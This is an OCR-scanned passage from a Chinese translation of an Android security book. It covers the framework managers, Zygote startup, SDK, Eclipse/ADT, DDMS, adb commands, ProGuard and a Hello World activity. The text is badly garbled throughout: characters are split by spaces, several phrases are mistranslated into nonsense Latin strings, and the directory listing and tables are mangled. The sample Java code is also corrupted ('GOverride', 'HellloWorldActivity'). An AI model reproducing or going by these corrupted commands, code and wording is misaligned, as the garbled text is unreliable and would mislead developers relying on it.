是 Java API 的 一 个 精简 版 本 。 例 如 ，Android 核心 库 不 支持 Swing 或 AWT 图 形 接 
口 ， 但 却 增 加 了 Android 特有 的 库 ， 如 SQLite, OpenGL $, ERARE P, (E 
用 J2SE 的 部 分 API 会 导致 较 高 的 资源 开销 ， 而 使 用 J2ME 则 不 仅 需 要 获得 相关 使 
用 授权 许可 ， 而 且 还 会 存在 一 定 的 安全 隐患 。 如 果 使 用 J2ME， 就 需要 为 每 一 部 设 
备 向 Oracle 支付 授权 许可 费用 。 而 且 ， 出 于 安全 考虑 ，Android 应 用 程序 应 当 需 要 
仅 能 在 Google 自己 开发 的 虚拟 机 (Dalvik 虚拟 机 ) 上 运行 ， 如 果 使 用 J2ME, BRA 
Android 应 用 程序 就 需要 在 别人 的 虚拟 机 (如 JVM) 上 运行 ,这样 就 可 能 导致 安全 
沙 箱 吕 功能 的 弱化 ， 从 而 存在 一 定 的 安全 隐患 。 


2.1.4 应 用 程序 框架 层 


Android 应 用 程序 框架 层 通 过 Java API 提供 了 一 组 功能 丰富 的 类 ， 供 开发 人 员 
在 应 用 程序 中 调用 。 这 些 类 的 功能 主要 通过 该 层 的 各 种 应 用 程序 管理 服务 实现 ， 其 
中 ， 最 重要 的 管理 服务 组 件 包 括 活动 管理 入 (Activity Manager) 、 资 源 管理 器 (Re- 


O ”安全 沙 箱 ， 蚌 一 种 按照 安全 策略 限制 程序 行为 的 执行 环境 ， 可 以 理解 为 一 种 安全 环境 。 一 一 译 者 注 
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source Manager), W AB Egy (Location Manager) 和 通知 管理 器 (Notification Man- 
ager) ， 该 层 主要 的 管理 服务 及 其 功能 说 明 见 表 2. 3。 
表 2.3 Android 应 用 程序 框架 层 的 管理 服务 
服 务 说 8j 


管理 应 用 程序 和 应 用 组 件 的 Activity 生命 周期 ， 当 应 用 程序 需要 开 
Activity Manager (活动 管理 器 ) 局 一 个 Activity 时 (如 通过 调用 startActivity( ) AX), 活动 管 理 器 提 


供 相 应 服务 功能 
共 对 本 地 资源 的 访 厂 .区 
Resource Manager (资源 管理 器 ) 提供 对 本 地 资源 的 访问 功能 ， 如 字符 串 、 图 片 和 布局 文件 等 本 地 
资源 
Location Manager (位 置 管理 器 ) 提供 对 位 置 更 新 的 支持 服务 ， 如 CPS 等 


Noifcaton Manager (通知 管理 器， | ， 为 应 用 程序 提供 显示 事件 通知 的 功能 ， 例 如 ， 当 应 用 程序 想 要 显示 
新 邮件 到 来 事件 ， 就 可 以 使 用 通知 管理 器 提供 的 服务 


包 管理 器 连同 安装 程序 〈 即 包 管 理 后 台 进 程 ) 一 起 用 于 应 用 程序 
的 安装 ， 维 护 已 效应 用 程序 及 其 组 件 的 信息 


使 应 用 程序 可 以 访问 另 一 个 应 用 程序 的 数据 〈 如 联系 人 数据 库 ) ， 
或 者 共享 它们 自己 的 数据 


Views (视图 ) 提供 一 组 丰富 的 视图 ， 供 应 用 程序 使 用 显示 信息 


Package Manager ( WE Eg ) 


Content Providers ( 内容 提供 者 ) 


2.1.5 应 用 程序 层 


默认 情况 下 ，Android 系统 会 自 带 一 组 功能 丰富 的 应 用 程序 ， 包括 浏览 闫 、 扰 
信息 程序 、 日 历 、 邮 件 客 户 端 、 地 图 应 用 、 联 系 人 、 音 乐 播放 器 等 ， 这 些 程序 都 是 
使 用 Java 语言 编写 的 。 如 果 用 户 愿意 ， 还 可 以 使 用 Google Play ( 即 Android 应 用 软 
件 市 场 ) 下 载 其 他 的 应 用 替换 它们 。Android 系统 不 会 区 分 应 用 程序 是 否 是 用 户 编 
写 还 是 系统 自 带 的 ， 就 像 浏览 器 。 用 户 能 够 下 载 火 狐 、Opera REREN AA, X 
于 Android 系统 来 说 ， 这 些 浏览 器 同系 统 内 置 的 浏览 器 都 会 被 同等 对 待 ， 用 户 可 以 
自己 选择 软件 替换 那些 默认 安装 好 了 的 软件 。 本 书 会 在 第 3 章 详细 讨论 Android 应 
用 程序 的 体系 结构 。 


2.2 Android 系统 启动 与 Zygote 


前 面 已 经 讨论 过 了 ，Android 系统 不 是 Linux 系统 ， 而 仅仅 是 基于 Linux 内 核 构 
建 的 ， 两 者 之 间 既 有 相同 之 处 ， 也 存在 很 大 的 不 同 。 所 有 的 Android 应 用 程序 在 内 
核 中 都 是 一 个 底层 的 Linux 进程 。 每 一 个 应 用 程序 在 运行 时 都 作为 一 个 单独 的 进程 
(少量 程序 除外 ) ， 默 认 情 况 下 ， 每 个 进程 中 至 少 有 一 个 线程 。 同 大 多 数 基于 Linux 
的 系统 一 样 ，Android 系统 启动 时 ， 引 导 装 载 器 (boot loader) 负责 加 载 内 核 〈 即 
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为 Android 系统 量 身 改进 的 Linux 内 核 ) ， 之 后 启动 init 进程 (也 称 为 初始 进程 ) 。 
所 有 其 他 的 进程 都 是 由 init 进程 产生 的 ， 该 进程 生成 很 多 后 台 进 程 ， 如 adb、USB， 
以 及 其 他 硬件 的 后 台 进 程 。 在 这 些 后 台 进 程 启动 之 后 ，init 进程 再 启动 Zygote 进 
程 。 再 由 Zygote 进程 启动 第 一 个 Dalvik 虚拟 机 并 预先 加 载 所 有 的 核心 类 ， 供 应 用 
程序 调用 。 之 后 ，Zygote 监听 socket 接口 ， 等 竺 新 Dalvik 虚拟 机 的 启动 请 求 。 

当 一 个 新 的 应 用 程序 启动 时 ，Zygote 将 收 到 新 Dalvik 虚拟 机 的 启动 请 求 。 此 
时 ，Zygote 会 分 裂 出 一 个 新 的 进程 ， 该 进程 继承 了 之 前 已 经 初始 化 并 启动 运行 的 
Dalvik 虚拟 机 代码 。 由 于 新 的 进程 只 是 继承 了 之 前 已 经 初始 化 并 运行 的 Dalvik 虚拟 
机 代码 ， 并 没有 重新 复制 所 需 的 共享 库 ， 除 非 应 用 程序 需要 修改 这 些 共享 库 ， 否 
则 ， 启 动 新 的 Dalvik 虚拟 机 不 会 导致 系统 速度 放 绥 。init 进程 局 动 Zygote 进程 之 
后 ，Zygote 进程 将 分 裂 出 一 个 名 为 “system server” 的 进程 ， 再 由 该 进程 启动 所 有 
Android 的 核心 服务 ， 如 Activity 管理 器 等 。 当 所 有 的 核心 服务 启动 完毕 ，Android 
平台 就 能 够 运行 用 户 打 开 的 应 用 程序 ， 每 个 应 用 程序 的 启动 都 会 使 Zygote 分 裂 出 
新 的 进程 并 创建 一 个 新 的 Dalvik 虚拟 机 。 


2.3 Android SDK 及 开发 工具 


本 节 将 搭建 Android 应 用 程序 的 开发 和 运行 环境 ， 虽 然 本 节 所 述 工具 主要 针对 
应 用 程序 开发 人 员 ， 但 是 对 于 普通 用 户 来 说 ， 在 对 Android 应 用 程序 进行 安全 检查 
时 ， 熟 悉 并 能 使 用 这 些 工 具 也 是 相当 重要 的 。 本 节 结 束 时 ， 读 者 应 该 能 够 在 自己 的 
电脑 上 搭建 Android 环境 ， 并 可 以 开发 、 编 译 、 运 行 和 调试 应 用 程序 。 

Android 环境 的 主要 组 成 部 分 如 下 : 

1) Android SDK (Software Development Kit， 软 件 开发 工具 包 )。 

2) Eclipse 集成 开发 环境 及 ADT ( Android Development Tool，Android 开发 
LR). 

3) 其 他 开发 工具 ， 包 括 DDMS, logeat 等 。 


2.3.1 Android SDK 下 载 与 安装 


Android SDK 用 于 开发 和 运行 Android 应 用 程序 ， 包 括 Android 库 、 工 具 以 及 范 
例 程序 ， 用 户 可 从 Android 网 站 上 免费 下 载 。 使 用 Android SDK 之 前 ， 必 须 安装 
Java SDK, Android SDK 的 安装 步骤 如 下 : 

1) 下 载 适合 自己 电脑 操作 系统 (如 Windows, Mace 或 Linux 系统 ) 的 SDK, 
如 果 你 的 系统 是 64 位 版 本 的 Windows 系统 ， 安 装 过 程 可 能 会 有 一 点 不 同 ， 不 过 该 
过 程 仍 然 是 非常 简单 的 。 对 于 Mae 和 Linux 系统 ， 需 要 先 将 SDK 安装 包 解 压 到 预 
期 目标 路 径 下 ， 然 后 使 用 解压 完毕 目录 内 的 Android 工具 进行 安装 。 各 种 实用 工具 
位 于 解压 目录 下 的 tools 文件 夹 中 ， 如 图 2.7 所 示 。 
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anmmisra-mac:android-sdk-macosx Anmol$ 1s 

SDK Readme.txt add-ons platforms tools 
anmmisra-mac:android-sdk-macosx Anmol$ ls -1 tools/ 
total 13056 

Anmol staff 170 Mar 
Anmol staff 330887 Mar 
Anmol staff 323 Mar 
Anmol staff 3491 Mar 
Anmol staff 170 Mar 
Anmol staff 1977 Mar 
Anmol staff 102 Mar 
Anmol staff 3116 Mar 
Anmol staff 52516 Mar 
Anmol staff 1940 Mar 
Anmol staff 45752 Mar 
Anmol staff 2719756 Mar 
Anmol staff 2619568 Marc 
Anmol staff 150488 Mar 
Anmol staff 3282 Mar 
Anmol staff 17408 Mar 
Anmol staff 2108 Mar 
Anmol staff 2015 Mar 
Anmol staff 17256 Mar 
Anmol staff 3169 Mar 
Anmol staff 340 Mar 
Anmol staff 66 Mar 
Anmol staff 602716 Mar 
Anmol staff 

-"WXxnwxr -XE Armol staff 

-NXrnwxr-x& Anmol staff 
anmnisra-mac:android-sdk-macosx Anmol$ [] 


.14 Jet 

NOTICE, txt 

adb has.moved.txt 
android 

ant 

apkbuilder 

apps 

ddms 
dmtracedump 
dcaw9patch 
emulator 
emulator-arm 
emulator-x86 
etcitool 
hierarchyviewer 
hprof -conv 

lib 

lint 

mksdcanrd 
monkeyrunner 
proguard 
Source.properties 
sglite3 

support 
traceview 
zipalign 


-rWxrwxr- xe 
-NX CWXT - x& 
-PWXnWxr -xe 
drwxrwx - - -e 
"PWXPWXTP - x& 
-"wxnwxrn -x& 
-rwxnwxr - x8 
drwxnwx- - -& 
-rW rw- r- -多 
= TYWXPWXF - x& 
drwxnwx - - -& 


3 
1 
1 
l 
5 
1 
3 
i 
1 
1 
1 
1 
1 
1 
1 
1 
2 


6 


2 3 123828 82 832825 282-831 2-12-121 2 2-1 2 1— 
32383333883353383338383833833 


UM jp 《ja H O ll pl lH 





E] 2.7 tools 文件 夹 内 的 各 种 实用 工具 


) 更 新 环境 变量 PATH， 在 PATH 变量 中 增加 “<SDK 路 径 >/tools” 和 “<SDK 

" »/platform-tools" 路 径 ， 这 样 即 使 在 SDK 目录 外 ， 也 能 通过 命令 行 调 用 这 些 SDK 
提供 的 Android TH. 

3) 在 命令 行 了 中 输入 "android" 命令 启动 SDK 管理 器 ， 选 择 想 要 下 载 的 An- 
droid 版 本 ，Android SDK ^F gir ri an A 2. 8 所 示 。 

要 想 开 始 使 用 Android， 首 先 需 要 利用 SDK 管理 器 创建 一 个 Android EU Ar 
( Android Virtual Device，AVD) ， 如 图 2.9 所 示 。AVD 创建 之 后 ， 就 可 以 在 SDK E 
理 器 中 使 用 AVD 管理 器 启动 它 ， 当 然 ， 用 户 也 可 以 直接 在 命令 行 输入 “emulator 
命令 局 动 Android 模拟 器 。 n 模拟 器 上 有 具有 完整 的 Android 软件 栈 功能 ， 用 于 测 
试 和 调试 Android 应 用 程序 。 如 果 身 边 没 有 真实 的 Android 设备 ， 使 用 Android 模拟 
fi zz JJ (8 


2.3.2 Eclipse 和 ADT 开发 环境 


Eclipse 是 一 个 开源 的 集成 开发 环境 ( Integrated. Development Environment , 
IDE) ， 附 带 大 量 有 助 于 程序 开发 的 工具 ， 广 受 Java 程序 员 的 欢迎 。 通 过 Eclipse 的 
插件 ， 还 可 以 使 用 其 他 编程 语言 开发 程序 ， 如 C、C ++ 、PHP 等 。 本 书 推荐 使 用 
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Eclipse 的 标准 开发 环境 开发 Android 应 用 程序 ， 用 户 可 从 http://www. eclipse. org/ 
downloads/ 网 站 下 载 Eclipse 软件 。 

使 用 Eclipse 开发 或 检查 Android 应 用 程序 ， 还 需要 下 载 安装 ADT (Android 
Development Tool, Android 开发 工具 ) 捅 件 ， 安 装 步 骤 如 下 : 

1) 打开 Eclipse 软件 ， 依 次 选择 “Help- > Install New Software" , 

2) 如 图 2. 10 FaR, Si “Adde” 按钮 添加 URL: "https; //dl-ssl. google. com/ 
android/ eclipse/ " , 

3) 在 下 拉 列 表 框 内 ， 勾 选 “ Developer Tools”, JFH rii "Next >” ffl, HE 
LNH a “Finish” 按钮 。 

4) 依次 选择 “ Eclipse - > Preferences - > Android", Hif “Browse” 按钮 选 
择 SDK 安装 路 径 。 








Available Software 
Check the items that you wish to install. 
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2.10 Eclipse 的 ADT 插件 提供 的 开发 工具 


2.3.3 Android 工具 
Android SDK 提供 很 多 有 用 的 工具 用 于 Android 应 用 程序 的 开发 、 测 试 和 分 析 ， 
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主要 工具 的 介绍 见 表 2.4。 本 书 不 会 对 所 有 工具 进行 详细 讨论 ， 仅 详细 讨论 与 本 书 
主题 相关 的 三 个 主要 的 工具 ， 包括 DDMS (Dalvik Debug Monitoring Service, Dalvik 
虚拟 机 调试 监控 服务 ) ADB (Android Debug Bridge, Android 调试 桥接 器 ) 和 Pro- 
Guard。 表 2.4 总 结 了 SDK 提供 的 这 些 工 具 及 其 用 途 。 通 过 Eclipse 的 ADT 插件 ， 
用 户 可 以 在 Eclipse 上 使 用 这 些 工 具 ， 尤 其 是 上 的 DDMS 视图 窗口 ， 能 够 显 
示 Android 应 用 程序 在 Dalvik 虚拟 机 上 的 运行 信息 。 相 应 工具 的 详细 信息 请 参考 下 
述 网 站 : 
http ://developer. android. com/ guide/ developing/ tools/ index. html 
表 2.4 SDK 提供 的 Android 工具 


D B 用 法 
android 用 于 从 命令 行 启动 SDK 管理 器 ， 管 理 AVD 以 及 安装 其 他 SDK 组 件 
emulator 用 于 在 电脑 上 启动 移动 设备 模拟 器 ， 适 用 于 手边 没有 真实 移动 设备 的 情况 


用 于 调试 Android 应 用 程序 ， 提 供 端口 转发 、 设 备 屏幕 截取 、 设 备 线程 和 堆 信 息 、 
logcat、 进 程 和 基带 信号 状态 信息 、 来 电 和 短信 模拟 、 位 置 数据 模拟 等 功能 服务 
hierarchyviewer 用 于 调试 和 优化 应 用 程序 的 用 户 界 面 
hprof- cony 用 于 将 Android 输出 的 HPROF 文件 转化 成 分 析 工 具 能 够 识别 查看 的 标准 格式 
sqlite 用 于 查看 Android 应 用 程序 使 用 或 创建 的 sqlite3 数据 库 
用 于 通过 命令 行 同 模拟 器 或 移动 设备 通信 ，adb 是 一 个 C/S (客户 端 /服务 器 ) 模 
式 的 程序 ， 可 以 让 开发 者 使 用 电脑 (作为 adb 客户 端 ) 同 模拟 器 或 真实 设备 (作为 
adb 服务 器 ) 进行 交互 。 例 如 ， 用 户 可 以 通过 adb shell 申 以 命令 的 形式 安装 Android 应 
用 程序 、 查 看 目标 设备 的 进程 信息 等 


ddms 


adb 


proguard Android 提供 的 内 置 的 代码 混淆 工具 
traceview 图 形 分 析 工 具 ， 用 于 查看 应 用 程序 的 日 志 信息 
dx 用 于 将 . class 字 节 码 转化 成 可 以 在 Dalvik 虚拟 机 上 运行 的 . dex 字 节 码 文件 
mksdcard 用 于 创建 模拟 器 使 用 的 SD 卡 磁盘 镜像 文件 
2.3.4 DDMS 


借助 模拟 器 或 手机 屏幕 能 够 使 用 户 在 UI (User Interface， 用 户 接口 或 人 机 交互 
接口 ， 这 里 指 的 是 应 用 程序 的 用 户 界面 ) 层面 上 查看 应 用 程序 的 行为 和 功能 。 但 
是 ， 要 想 了 解 UI 背后 的 应 用 程序 运行 细节 ， 就 需要 使 用 DDMS TH, DDMS 工具 
具有 强大 的 功能 ， 使 用 它 可 以 获得 进程 运行 的 详细 信息 、 堆 栈 信 息 ， 以 及 浏览 查看 
模拟 器 或 相连 的 移动 设备 的 文件 系统 等 。 此 外 ， 通 过 Eclipse 的 ADT 插件 ， 用 户 还 


© adb shell， 是 adb 提供 的 shell 程序 ， 用 于 用 户 通 过 它 使 用 命令 同 Android 基于 的 Linux 内 核 进 行 交 互 ， 
类 似 于 Windows 系统 上 的 命令 提示 符 窗口 ， 或 是 Linux 系统 上 的 bash。 一 一 译 者 注 
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可 以 访问 logeat 工具 产生 的 设备 (Bk das) 的 目 志 记录 。 

在 Linux 或 Mac 系统 上 上， 用户 可 以 在 命令 行 窗 口中 输入 “ddms” 命令 启动 
DDMS 工具 ， 如 图 2. 11 所 示 。 也 可 以 在 Eclipse 软件 上 使 用 ADT 插件 访问 DDMS 视 
图 窗口 ， 如 图 2. 12 所 示 。 从 图 2. 11 中 可 见 ， 通 过 DDMS 可 以 获得 在 模拟 器 或 真实 
设备 上 运行 进程 的 大 量 信息 ， 图 中 左上 角 区 域 显示 的 是 正在 运行 的 进程 列表 ， 点 击 
任意 进程 即 可 查看 该 进程 的 相关 信息 。 该 图 中 的 进程 列表 内 显示 有 各 个 进程 的 ID 
和 进程 名 。 例 如 ， 点 击 名 为 com. Adam. CutePuppiesWallpaper 的 进程 ， 可 以 在 右边 
窗口 中 使 用 各 种 标签 查看 该 进程 的 堆栈 信息 和 与 之 关联 的 线程 信息 等 。DDMS 还 可 
以 显示 详细 的 模拟 器 事件 信息 。 例 如 ， 在 该 图 中 ， 当 壁纸 应 用 程序 启动 后 ， 即 可 在 
窗口 下 方 的 Log 日 志 记 录 信 息 中 看 到 MCS_BOT_Service 服务 随 之 启动 。 随 后 ，Log 
日 志 窗 口内 显示 系统 抛 出 未 知 主 机 异常 ，k2homeunix. com 无 法 访问 ( 即 “Unknown 
Host Exception; k2homeunix. com”) ， 继 而 ， 壁 纸 应 用 程序 退出 关闭 。 
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2.11 Android SDK 提供 的 DDMS 工具 


2.3.5 .adb 
adb 是 一 个 客户 端 - 服 务 器 程序 ， 用 于 同 Android 模拟 器 或 真实 设备 进行 交 
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图 2.12 Eclipse ADT 上 的 DDMS 视图 窗口 


互 ， 主 要 由 三 部 分 构成 : adb 后 人 台 进 程 ( 即 /sbin/adbd JF), Æ Android 设备 
或 模拟 器 上 运行 ; adb 服务 ， 在 开发 系统 〈 即 个 人 电脑 ) 上 和 运行; 客户 端 程 
F, ùN adb zX ddms TR, 同样 运行 在 开发 系统 上 ， 使 用 adb 服务 同 adb Jr S xt 
程 通信 。 

借助 adb 可 以 通过 adb shell 在 模拟 带 或 设备 上 执行 交互 性 的 命令 ， 如 安装 apk 
文件 2、 提 取 7 推 送 〈 将 文件 放 进 模拟 器 或 真实 设备 ) 文件 ， 以 及 执行 j 其 他 shell 命 
SO, EMA EZITA adb shell 拥有 root 权限 ， 可 以 访问 模拟 器 上 的 任何 文件 ， 具 
有 最 高 的 操作 权限 。 相反 ， 在 真实 设备 上 ，adb shell 默认 提供 一 般 用 户 权 限 ， 只 能 
使 用 有 限 的 功能 操作 ， 对 于 一 些 敏感 操作 则 没有 权限 执行 2 。 

使 用 adb 可 以 执行 的 一 些 重要 命令 见 表 2.5。 全 部 命令 请 参阅 网 站 : http: // 
developer. android. com/guide/developing/tools/adb. html 提供 的 文档 。 


O  apk 文件 即 Android 应 用 程序 的 发 布 形式 ， 每 一 个 Android 应 用 程序 的 安装 包 是 一 个 以 . apk 为 扩展 名 
的 压缩 文件 。 一 一 译 者 注 

© JKfhshell 命令 ， 如 一 些 常用 的 Linux 命令 , Rls, cd 等 。 一 一 译 者 注 

© ”用 户 权限 方面 的 知识 请 参阅 Linux 相关 书籍 。 一 一 译 者 注 
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表 2.5 主要 的 adb 命令 
用 途 adb 命令 
adb [-d] [-e] [-s < 设备 序列 号 > ] 命令 ， 用 于 激活 adb 客户 端 ， 当 有 


发 布 adb 命令 多 个 Android 设备 或 模拟 器 运行 时 ，-d 选项 用 于 指定 命令 执行 的 目标 设 
备 ，-e 选项 表示 命令 将 直接 被 用 在 模拟 器 上 执行 


adb devices， 用 于 显示 所 有 已 经 连接 的 Android 设备 和 模拟 器 的 序列 号 ， 


sie 
| 有 它们 的 状态 信息 ， 如 离线 Coline) 和 在 线 (device) 


adb-s emulator-5556 install helloworld. apk ， 用 于 在 指定 序列 号 的 Android 
安装 应 用 程序 (apk) 设备 上 安装 应 用 程序 ， 这 里 指 将 helloworld. apk 程序 安装 到 序列 号 为 emu- 
lator-5556 的 模拟 器 上 


adb pull < remote > «local > fil adb push «local > < remote >, adb pull 将 
模拟 器 或 设备 上 的 < remote > 路 径 指定 的 文件 复制 到 本 地 磁盘 < local > 路 


/ [n ] 29 uy 
人 径 ，adb push 将 本 地 磁盘 <local > 路 径 指 定 的 文件 复制 到 模拟 器 或 设备 的 
« remote > 路 径 下 
查看 日 志 信息 adb logcat， 用 于 在 屏幕 上 打印 模拟 器 或 设备 的 日 志 记 录 


adb shell «command > ， 用 于 在 模拟 器 或 真实 设备 上 执行 指定 的 shell dir 
令 ， 例 如 adb shell ps 将 显示 模拟 器 或 设备 上 运行 的 进程 列表 


adb shell sqlite3， 开 启 SQLite 数据 库 自 有 的 命令 行 工具 ， 即 sqlite3。 通 
过 sqlite3 命令 行 工具 可 以 分 析 模 拟 器 或 真实 设备 系统 上 的 SQLite 数据 库 


可 交互 的 shell 命令 


检查 SQLite 数据 库 


2.3.6  ProGuard 


ProGuard 是 Android SDK 提供 的 代码 混淆 工具 ， 由 于 Java 类 文件 很 容易 被 反 编 
译 ， 因 此 在 开发 编译 应 用 程序 时 ， 执 行 代码 混淆 是 防止 程序 被 反 编译 的 一 个 很 好 的 
方法 。ProGuard 工具 通过 删除 一 些 没 用 的 代码 和 修改 类 、 变 量 和 函数 的 名 称 ， 实 现 
代码 压缩 、 优 化 和 混淆 的 功能 ， 这 样 可 以 使 别人 在 对 应 用 程序 进行 逆向 工程 中 消耗 
更 多 的 时 间 ， 从 而 达到 保护 代码 安全 的 目的 。ProCuard 的 激活 步骤 概括 如 下 : 

1) 下 载 并 安装 最 新 的 SDK。 使 用 旧版 本 SDK 创建 的 工程 ， 在 后 续 执 行 混 消 操 
作 时 ， 可 能 会 出 现 问题 。 如 果 创 建 的 应 用 程序 使 用 的 SDK 已 经 是 最 新 版 本 ， 那 么 
请 直接 跳 转 到 步骤 4。 

2) 如 果 工 程 使 用 的 是 旧版 本 的 SDK 创建 的 ， 则 需要 更 新 该 工程 。 执 行 下 述 命 
今 ， 将 会 显示 一 组 Android API 版 本 列表 ， 然 后 选择 与 已 用 SDK 版 本 相 适 应 的 API 
版 本 : 

D ; \eclipse \workspace > android. bat list targets \ 

3) 使 用 所 选 的 API 版 本 更 新 之 前 创建 的 工程 ， 命 令 如 下 : 


D; \eclipse \workspace > android update project —name Hello World —target 3 — 
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path D: \eclipse workspace \ HelloWorld \ 
4) 在 创建 的 工程 根 目录 下 ， 执 行 ant 命令 
D ; \eclipse \workspace \HelloWorld \ant 
5) 修改 本 地 . properties 文件 ， 增 加 如 下 代码 : 
proguard. config = proguard. cfg 
6) 使 用 发 布 模式 编译 工程 ， 命 令 如 下 : 


ant release 


2.4 “Hello World” 应 用 程序 详解 


通过 剂 析 简 单 的 “Helloe World” 应 用 程序 ， 可 以 熟悉 Android LE RUM FIERE 
中 的 各 种 文件 和 组 件 。 创 建 一 个 “Hello World” 应 用 程序 ， 首 先 需 要 打开 Eclipse 
软件 ， 将 所 需 的 API 版 本 设置 成 编译 目标 (所 需 的 API 版 本 ， 也 就 是 对 外 发 布 的 
Android 系统 版 本 ， 应 用 程序 代码 将 在 所 选 的 Android 版 本 系统 上 运行 ) ， 然 后 输入 
应 用 程序 名 和 包 名 。 上 述 操作 完成 之 后 ， 创 建 的 Android 项 目的 根 目录 下 将 包含 类 
似 于 表 2.6 中 的 目录 ， 其 中 /res 目录 下 的 两 个 文件 : AndroidManifest. xml. 和 
strings. xml 对 Android 的 安全 性 具有 重要 的 意义 。 


 X2.6 Android 应 用 程序 目录 解析 


AL HE Æ 描 述 
src 存放 应 用 程序 的 源码 文件 ， 本 例 中 ，HelloActivity. java 文件 存放 于 该 文件 夹 
gen 存放 由 /res 文件 夹 内 的 资源 文件 生成 的 代码 
Android 2. 3. 3 存放 目标 Android 系统 版 本 的 android. jar 文件 
assets 存放 用 于 同 应 用 程序 捆绑 发 布 的 其 他 文件 


用 于 编译 、 运 行 应 用 程序 ， 存 放 Android 应 用 程序 安装 包 ， 即 apk 文件 ， 以 及 
应 用 程序 编译 之 后 的 classes. dex 文件 


存放 应 用 程序 所 需 的 资源 文件 ,包括 布局 文件 〈layout) 、 赋 值 文件 〈 即 value, 
如 字符 串 等 ) 和 图 像 文 件 (drawable) 等 。 布 局 、 字 符 串 以 及 其 他 的 资源 定义 在 
xml 文件 中 ， 编 译 时 系统 会 自动 将 这 些 资源 编程 成 R 类 (R. class 文件 ) 的 变量 
res 并 生成 相应 的 资源 中， 在 程序 代码 中 直接 使 用 Java 语句 调用 资源 ID， 即 可 访问 
这 些 资源 文件 。 安 全 专员 往往 对 strings. xml 文件 更 感 兴趣 ， 因 为 该 文件 用 于 定义 
应 用 程序 使 用 的 字符 串 ， 而 很 多 应 用 程序 会 把 敏感 字符 串 信 息 放 在 该 文件 中 ， 只 
需 使 用 简单 的 逆向 工程 技术 就 能 获取 这 些 字符 串 信 息 ， 导 致 信息 泄露 


该 文件 定义 了 Android 应 用 程序 的 各 种 组 件 (如 Activity、Service 和 Broadcast 
AndroidManifest. xml | Receiver 等 )、 包 信息 、 同 其 他 应 用 程序 交互 的 权限 、 调 用 本 地 受 保护 API 的 权 
限 ， 以 及 其 他 应 用 程序 访问 本 应 用 程序 组 件 的 权限 


proguard- project. txt 用 于 ProGuard 的 配置 文件 


bin 
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2.4.1 认识 “Hello World” 程序 


本 广 将 通过 分 析 "Hello World” 程 序 源码， 了 人 解 其 运行 的 大 体 过 程 。 几 乎 每 
一 个 Android 应 用 程序 的 核心 都 是 Activity 组 件 。 

Activity 是 一 个 单独 的 屏幕 界面 ， 该 组 件 基 于 设备 屏幕 同 用 户 进行 交互 。 例 如 ， 
登录 Twitter 软件 时 ， 用 户 输入 账号 和 密码 的 屏幕 界面 。 

通常 对 于 一 个 应 用 程序 来 说 ， 会 由 多 个 Activity 组 件 构 成 ， 每 一 个 Activity 就 是 
屏幕 上 显示 的 一 个 界面 。 但 对 于 简单 的 应 用 程序 来 说 ， 以 “Hello World” 程 序 为 
例 ， 也 可 以 只 有 一 个 Activity, BD EUG — BESTE RA IE, AFE “Hello World, 
HelloWorldActivity” 字 符 串 。 程 序 启动 时 ， 屏 幕 上 即 显 示 上 述 字样 并 在 logcat 窗口 
REA “Hello Logcat" 日 志 信 息 。 

图 2. 13 显示 了 HelloWorldActivity 的 屏 大 显示 界面 ， 其 源码 如 代码 段 4 所 示 。 
首先 ， 定 义 了 包 名 “com. androidsecurity. helloworld”。 然 后 ， 导 入 该 程序 所 需 的 功 
能 类 ， 有 些 类 是 必须 导入 的 ， 如 “android. app. Activity” 类 ， 其 他 类 取决 于 应 用 程 
序 的 功能 需求 ， 如 “android. util. Log” 类 ， 如 果 程 序 不 需要 日 志 功 能 ， 可 以 不 导入 
该 类 。Activity 是 基 类 ， 用 于 应 用 程序 在 屏幕 上 显示 可 视 的 组 件 或 UI。 本 应 用 程 
FHJ Activity 类 ( 即 “HelloWorldActivity” 类 ) 需要 继承 该 基 类 ， 重 写 父 类 的 on- 
Create( ) 方 法 ， 在 其 中 增加 自 定义 的 功能 ， 如 设置 屏幕 显示 或 UI 的 外 观 ， 以 及 





图 2.13 HelloWorldActivity Jf [fl 
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[j logcat 窗 日 输出 日 志 人 信息。 屏幕 上 显示 的 ULI 界面 布局 通过 setContentView 
(R. layout. main) 方法 实现 。 如 果 程 序 有 多 个 屏幕 显示 界面 ， 可 通过 setContentView( ) 
方法 为 每 个 屏幕 显示 界面 导 人 不 同 的 UI 布局 文件 ， 如 以 R. layout. secondlayout 作为 
setContentView( ) 的 参数 ， 就 是 把 secondlayout xml 布局 文件 中 定义 的 布局 导 人 调用 
该 方法 的 Aetivity 界面 。 类 文件 R 提供 了 一 种 在 Java 代码 中 引用 定义 在 xml 文件 中 
布局 或 变量 的 方法 ， 相 当 于 视图 或 xml 文件 同 Java 代码 之 间 衔 接 的 桥梁 。 在 代码 
段 4 的 最 后 ， 使 用 log.v ( "Hello World”, “Hello LogCat!" ) 方法 向 日 志文 件 中 输 
出 “Hello LogCat1” 日 志 信 息 。 同 其 他 级 别 的 日 志 函 数 相 比 ， 如 调试 (debug) 和 
警告 ( waming) 等 ，Log.v 日 志 图 数 用 于 显示 详细 的 日 志 人 信息。 在 log v 
(“Hello World", "Hello LogCat!") i&/H]rP, "Hello World” 是 日 志 的 事件 标签 ， 
"Hello Logcat1!1” 是 相应 日 志 事 件 的 值 ， 也 就 是 日 志 信 息 。 


package com.androidsecurity.helloworld; 


import android.app.Activity; 
import android.os.Bundle; 
import android.util.Log; 


public class HellloWorldActivity extends Activity i 
| /** Called when the activity is first created. */ 
GOverride 
public void onCreate(Bundle savedInstanceState) | 
super.onCreate(savedInstanceState); 
setContentView(R.layout.main); 
Log.v("Hello World", "Hello LogCat!"); 


代码 段 4  HelloWorldActivity 源码 


屏幕 显示 界面 /可 视 组 件 的 布局 或 结构 使 用 XML 文件 定义 。 由 于 本 节 解 析 的 应 
用 程序 只 有 一 个 Activity， 因 此 只 定义 了 一 个 布局 文件 ， 即 /res/layouts/main. xml X: 
件 。 该 布局 源码 如 代码 段 5 所 示 。 基 本 上 ， 该 布局 只 用 了 一 个 线 型 布局 Linearlay- 
out， 并 在 其 中 添加 TextView 组 件 显示 文本 信息 ， 通 过 @ string/hello 告诉 应 用 程序 
显示 存储 在 名 为 “hello” 变 量 中 的 字符 串 ， 该 变量 在 /resyvalues/strings. xml 字符 串 
文件 中 定义 ， 如 代码 段 6 所 示 。 此 代码 段 内 定义 了 两 个 字符 串 ， 即 变量 名 为 
"name" 的 字符 串 “Hello World，HelloWorldAcbvity!1” 和 字符 串 变 量 名 为 “app_ 
name” 的 “HelloWorld”。 其 中 ， 变 量 名 为 “app_ name” 的 字符 串 被 Manifest. xml 
文件 引用 。 

